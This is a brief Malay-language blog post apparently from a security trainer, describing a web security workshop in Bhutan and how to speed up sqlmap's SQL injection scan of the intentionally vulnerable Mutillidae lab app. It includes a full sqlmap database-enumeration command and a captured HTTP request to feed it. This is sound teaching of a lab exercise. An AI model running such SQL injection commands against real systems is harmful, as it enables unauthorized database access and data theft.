2 minggu lepas ada buat workshop Web Application Security di Thimpu, Bhutan (kerjasama dengan BtCIRT)

Untuk lab SQL injection, saya dapati sqlmap ambil masa yang agak lama untuk scan database Mutillidae. Rupa-rupanya arahan default (parameter –technique) perlu diubah sedikit. Defaultnya adalah BEUST

  • B: Boolean-based blind SQL injection
  • E: Error-based SQL injection
  • U: UNION query SQL injection
  • S: Stacked queries SQL injection
  • T: Time-based blind SQL injection

    sqlmap -r request.txt -p username –dbms=mysql -o –threads=10 –technique=BEUS –dbs

Nota: request.txt mengandugi URL & parameter yang boleh disql-inject, boleh dicapture oleh Zap Proxy

GET [http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details](http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details) HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8Accept-Language: en-US,en;q=0.5Referer: [http://localhost/mutillidae/index.php?page=user-info.php](http://localhost/mutillidae/index.php?page=user-info.php)Connection: keep-aliveCookie: showhints=1; PHPSESSID=r8mv7ultidjmnndr25al8mqosiUpgrade-Insecure-Requests: 1